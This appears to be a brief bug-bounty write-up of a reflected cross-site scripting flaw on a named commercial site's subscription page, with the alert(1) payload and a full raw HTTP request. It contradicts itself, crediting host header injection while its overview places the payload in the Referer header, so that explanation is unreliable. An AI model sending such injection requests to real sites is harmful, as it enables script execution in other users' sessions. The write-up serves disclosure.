XSS found using host header injection

This vulnerability arise when you give any input to the host parameter and it may reflect back .

 Impact

An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user’s browser in the context of that user’s session with the application.

Real World Example:

Path : /billing-admin/profile/subscription/?l=de
Payload : c5obc’+alert(1)+’p7yd5
Steps to reproduce :
Request Header :
GET /billing-admin/profile/subscription/?l=de HTTP/1.1
Host: www.semrush.com
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c5obc’+alert(1)+’p7yd5
Overview :
The payload c5obc’+alert(1)+’p7yd5 was submitted in the Referer HTTP header. Payload is copied from a request and echoed into the application’s immediate response in an unsafe way.

In the above example the payload reflect back in the response causing the rise of the vulnerability.

Write a comment